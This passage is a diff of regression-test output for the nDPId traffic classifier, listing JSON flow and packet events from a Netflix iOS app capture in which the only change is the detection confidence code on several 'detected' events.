{"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.10.139","url":"23.246.10.139\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-djGXIcbFBNzyfugqEWcrgtCpyY&random=3407360776","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319054101,"flow_last_seen":1484319054101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319054101,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1484319054101,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319054101,"pkt":"gCqoTGHM5JjWH70UCABFAABA9bFAAEAGZ9XAqAEHF\/YDjM+zAFBtwXYMAAAAALAC\/\/99\/AAAAgQFtAEDAwUBAQgKH2UImQAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1484319054132,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319054132,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz7OFwt93bcF2DaAS\/\/\/aJAAAAgQFtAEDAwkEAggKhKDK7B9lCJk="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1484319054134,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319054134,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mQ1AAEAGxIXAqAEHF\/YDjM+zAFBtwXYNhcLfeIAQEBX4vQAAAQEICh9lCLmEoMrs"} -01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319054101,"flow_last_seen":1484319054139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":354,"flow_tot_l4_payload_len":354,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1484319054139,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4&random=357509657","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
+01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319054101,"flow_last_seen":1484319054139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":354,"flow_tot_l4_payload_len":354,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1484319054139,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4&random=357509657","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056204,"flow_last_seen":1484319056204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056204,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1484319056204,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056204,"pkt":"gCqoTGHM5JjWH70UCABFAABAfy9AAEAG1l7AqAEHF\/YLhc+0AFDwxwoWAAAAALAC\/\/9XEAAAAgQFtAEDAwUBAQgKH2UQewAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056210,"flow_last_seen":1484319056210,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056210,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -192,7 +192,7 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1484319056219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056219,"pkt":"gCqoTGHM5JjWH70UCABFAAA0oIhAAEAGtRHAqAEHF\/YLhc+0AFDwxwoXZwEyloAQEBUoBwAAAQEICh9lEIg1aY+l"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056221,"flow_last_seen":1484319056221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056221,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1484319056221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056221,"pkt":"gCqoTGHM5JjWH70UCABFAABAtyBAAEAGnmXAqAEHF\/YLjc+3AFC7qylgAAAAALAC\/\/9syQAAAgQFtAEDAwUBAQgKH2UQiQAAAAAEAgAA"} 
-01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1237,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056204,"flow_last_seen":1484319056222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056222,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10&random=2473336513","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1237,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056204,"flow_last_seen":1484319056222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056222,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10&random=2473336513","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056232,"flow_last_seen":1484319056232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056232,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1484319056232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056232,"pkt":"gCqoTGHM5JjWH70UCABFAABA7BpAAEAGaWvAqAEHF\/YLjc+4AFBql8CVAAAAALAC\/\/8mpAAAAgQFtAEDAwUBAQgKH2UQjAAAAAAEAgAA"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056233,"flow_last_seen":1484319056233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056233,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -209,13 +209,13 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1484319056241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Xt9AAEAG9rLAqAEHF\/YLjc+3AFC7qylhVgS+poAQEBUMigAAAQEICh9lEJq4h8Kl"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056241,"flow_last_seen":1484319056241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1484319056241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAABAWzRAAEAG+lHAqAEHF\/YLjc+8AFAt4\/K3AAAAALAC\/\/8xJAAAAgQFtAEDAwUBAQgKH2UQmgAAAAAEAgAA"} 
-01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056214,"flow_last_seen":1484319056241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJpmQIRekGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThrvnlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=mQfOf90-RY2Gd2ii20KJpCcYQVk&random=1345646229","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056210,"flow_last_seen":1484319056253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056253,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJZ2bLBChGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_ngHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=SixKQmLLJNvShj-pfML-2h4QaqQ&random=727666104","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056214,"flow_last_seen":1484319056241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJpmQIRekGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThrvnlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=mQfOf90-RY2Gd2ii20KJpCcYQVk&random=1345646229","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
+01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056210,"flow_last_seen":1484319056253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056253,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJZ2bLBChGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_ngHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=SixKQmLLJNvShj-pfML-2h4QaqQ&random=727666104","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABAgCRAAEAG1WHAqAEHF\/YLjc+9AFCAerrsAAAAALAC\/\/8WUwAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABA6tRAAEAGarHAqAEHF\/YLjc++AFBtOQm6AAAAALAC\/\/\/axQAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} 
-01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1253,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056221,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8&random=323765950","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1253,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056221,"flow_last_seen":1484319056264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8&random=323765950","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7vga1YT37t1VqAS\/\/\/ATQAAAgQFtAEDAwkEAggKs1tjeh9lEJY="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7h\/u26MapfAlqAS\/\/8KPAAAAgQFtAEDAwkEAggKFFAqwB9lEIw="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7qJ1p961ZDNAaAS\/\/87aAAAAgQFtAEDAwkEAggKTYEN7B9lEJM="} 
@@ -224,19 +224,19 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gLJAAEAG1N\/AqAEHF\/YLjc+4AFBql8CWf7tujYAQEBUowwAAAQEICh9lEL4UUCrA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0s8BAAEAGodHAqAEHF\/YLjc+6AFDVkM0Bidafe4AQEBVZ9gAAAQEICh9lEL5NgQ3s"} 